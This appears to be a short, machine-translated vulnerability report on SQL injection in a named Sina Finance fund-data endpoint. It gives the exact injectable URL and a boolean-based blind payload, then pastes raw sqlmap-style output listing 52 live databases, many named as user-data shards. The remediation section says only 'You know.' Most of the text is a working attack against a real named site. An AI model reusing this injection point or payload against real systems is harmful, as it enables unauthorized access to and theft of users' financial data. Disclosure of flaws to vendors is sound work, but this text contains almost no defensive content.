SQL injection 2 exists somewhere in Sina financial
Involving 52 databases that affect a large amount of user data
Injection point: http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/funds_jjpj/FundRank_Service.getHTSMFundManagerInfo? Page = 1 & num = 6 & sort = new_star_level * & asc = 0 & ccode = & type = 0 & date =
Parameter: #1* (URI) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: http://vip.stock.finance.sina.com.cn:80/fund_center/data/jsonp.php/funds_smsy/PEFundService.getHowBuyData?page=1&num=10&sort=(SELECT (CASE WHEN (6998=6998) THEN 6998 ELSE 6998*(SELECT 6998 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&asc=0&ccode=&date=&month=---[20:28:10] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0[20:28:10] [INFO] fetching database names[20:28:10] [INFO] fetching number of databases[20:28:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[20:28:10] [INFO] retrieved: 52[20:28:10] [INFO] retrieved: information_schema[20:28:25] [INFO] retrieved: dealcollection[20:28:34] [INFO] retrieved: finance_user_0[20:28:42] [INFO] retrieved: finance_user_1[20:28:49] [INFO] retrieved: finance_user_10[20:28:57] [INFO] retrieved: finance_user_11[20:29:05] [INFO] retrieved: finance_user_12[20:29:12] [INFO] retrieved: finance_user_13[20:29:25] [INFO] retrieved: finance_user_14[20:29:33] [INFO] retrieved: finance_user_15[20:29:43] [INFO] retrieved: finance_user_16[20:29:51] [INFO] retrieved: finance_user_17[20:30:05] [INFO] retrieved: finance_user_18[20:30:12] [INFO] retrieved: finance_user_19[20:30:21] [INFO] retrieved: finance_user_2[20:30:28] [INFO] retrieved: finance_user_20[20:30:38] [INFO] retrieved: finance_user_21[20:30:47] [INFO] retrieved: finance_user_22[20:30:57] [INFO] retrieved: finance_user_23[20:31:07] [INFO] retrieved: finance_user_24[20:31:17] [INFO] retrieved: finance_user_25[20:31:24] [INFO] retrieved: finance_user_26[20:31:32] [INFO] retrieved: finance_user_27[20:31:39] [INFO] retrieved: finance_user_28[20:31:47] [INFO] retrieved: finance_user_29[20:31:55] [INFO] retrieved: finance_user_3[20:32:07] [INFO] retrieved: finance_user_30[20:32:15] [INFO] retrieved: finance_user_31[20:32:23] [INFO] retrieved: finance_user_32[20:32:33] [INFO] retrieved: finance_user_33[20:32:41] [INFO] retrieved: finance_user_34[20:32:51] [INFO] retrieved: finance_user_35[20:33:00] [INFO] retrieved: finance_user_4[20:33:09] [INFO] retrieved: finance_user_5[20:33:18] [INFO] retrieved: finance_user_6[20:33:29] [INFO] retrieved: finance_user_7[20:33:36] [INFO] retrieved: finance_user_8[20:33:45] [INFO] retrieved: finance_user_9[20:33:53] [INFO] retrieved: hkstock[20:33:57] [INFO] retrieved: moneyfinance[20:34:03] [INFO] retrieved: mysql[20:34:06] [INFO] retrieved: nagiosdmm[20:34:11] [INFO] retrieved: performance_schema[20:34:19] [INFO] retrieved: stp_user_0[20:34:25] [INFO] retrieved: stp_user_1[20:34:54] [INFO] retrieved: stp_user_2[20:35:03] [INFO] retrieved: stp_user_3[20:35:11] [INFO] retrieved: stp_user_4[20:35:18] [INFO] retrieved: stp_user_5[20:35:25] [INFO] retrieved: test[20:35:27] [INFO] retrieved: xddmm[20:35:31] [INFO] retrieved: zjmdmmavailable databases [52]:[*] dealcollection[*] finance_user_0[*] finance_user_1[*] finance_user_10[*] finance_user_11[*] finance_user_12[*] finance_user_13[*] finance_user_14[*] finance_user_15[*] finance_user_16[*] finance_user_17[*] finance_user_18[*] finance_user_19[*] finance_user_2[*] finance_user_20[*] finance_user_21[*] finance_user_22[*] finance_user_23[*] finance_user_24[*] finance_user_25[*] finance_user_26[*] finance_user_27[*] finance_user_28[*] finance_user_29[*] finance_user_3[*] finance_user_30[*] finance_user_31[*] finance_user_32[*] finance_user_33[*] finance_user_34[*] finance_user_35[*] finance_user_4[*] finance_user_5[*] finance_user_6[*] finance_user_7[*] finance_user_8[*] finance_user_9[*] hkstock[*] information_schema[*] moneyfinance[*] mysql[*] nagiosdmm[*] performance_schema[*] stp_user_0[*] stp_user_1[*] stp_user_2[*] stp_user_3[*] stp_user_4[*] stp_user_5[*] test[*] xddmm[*] zjmdmm
Solution:
You know.